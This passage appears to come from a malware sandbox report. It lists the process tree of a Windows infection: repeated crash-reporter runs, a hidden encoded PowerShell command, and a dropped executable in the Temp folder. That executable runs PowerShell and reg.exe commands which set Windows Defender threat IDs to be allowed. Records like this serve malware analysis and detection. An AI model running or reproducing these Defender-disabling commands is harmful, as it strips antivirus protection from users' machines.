                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2624 -ip 2624
                                                                  1⤵
                                                                    PID:2404
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                    1⤵
                                                                      PID:548
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2624 -ip 2624
                                                                      1⤵
                                                                        PID:1348
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 2624
                                                                        1⤵
                                                                          PID:1588
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 2624
                                                                          1⤵
                                                                            PID:2528
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 2624
                                                                            1⤵
                                                                              PID:3400
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 2624
                                                                              1⤵
                                                                                PID:1436
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                1⤵
                                                                                  PID:1120
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 2624
                                                                                  1⤵
                                                                                    PID:3860
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2624 -ip 2624
                                                                                    1⤵
                                                                                      PID:1724
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 2624
                                                                                      1⤵
                                                                                        PID:3056
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                        1⤵
                                                                                          PID:1444
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 2624
                                                                                          1⤵
                                                                                            PID:2096
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 2624
                                                                                            1⤵
                                                                                              PID:2052
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                              1⤵
                                                                                                PID:4724
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2624 -ip 2624
                                                                                                1⤵
                                                                                                  PID:1268
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 2624
                                                                                                  1⤵
                                                                                                    PID:3476
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                                    1⤵
                                                                                                      PID:808
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 2624
                                                                                                      1⤵
                                                                                                        PID:2600
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                                        1⤵
                                                                                                          PID:4268
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1160
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2624 -ip 2624
                                                                                                            1⤵
                                                                                                              PID:1120
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2624 -ip 2624
                                                                                                              1⤵
                                                                                                                PID:3864
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                                                1⤵
                                                                                                                  PID:3720
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2624 -ip 2624
                                                                                                                  1⤵
                                                                                                                    PID:1668
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 2624
                                                                                                                    1⤵
                                                                                                                      PID:2220
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2624 -ip 2624
                                                                                                                      1⤵
                                                                                                                        PID:4568
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 2624
                                                                                                                        1⤵
                                                                                                                          PID:776
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 2624
                                                                                                                          1⤵
                                                                                                                            PID:3664
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                                                            1⤵
                                                                                                                              PID:4088
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2624 -ip 2624
                                                                                                                              1⤵
                                                                                                                                PID:2584
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2624 -ip 2624
                                                                                                                                1⤵
                                                                                                                                  PID:2540
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2624 -ip 2624
                                                                                                                                  1⤵
                                                                                                                                    PID:2492
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 2624
                                                                                                                                    1⤵
                                                                                                                                      PID:3360
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2624 -ip 2624
                                                                                                                                      1⤵
                                                                                                                                        PID:5964
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 2624
                                                                                                                                        1⤵
                                                                                                                                          PID:6012
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2624 -ip 2624
                                                                                                                                          1⤵
                                                                                                                                            PID:5492
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 2624
                                                                                                                                            1⤵
                                                                                                                                              PID:6100
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2624 -ip 2624
                                                                                                                                              1⤵
                                                                                                                                                PID:5204
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2624 -ip 2624
                                                                                                                                                1⤵
                                                                                                                                                  PID:5644
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 2624
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5820
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:5872
                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5960
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2624 -ip 2624
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5668
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 2624
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5980
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1612
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4672
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2624 -ip 2624
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2688
                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:6004
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2624 -ip 2624
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6044
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2624 -ip 2624
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6088
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2624 -ip 2624
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:544
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2624 -ip 2624
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6092
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\GIVcqKU.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\GIVcqKU.exe js /site_id 690689 /S
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          PID:2772
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:2408
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5236
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4540
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2436
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4364
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2492
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5276
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5156
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5212
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:112
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3956
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2116
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2784
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3276
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5092
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3800
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2404
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4748
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:1756
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5344
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5400
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3852
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5376
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2888
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1912
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4016
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1852
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5404
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5488
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
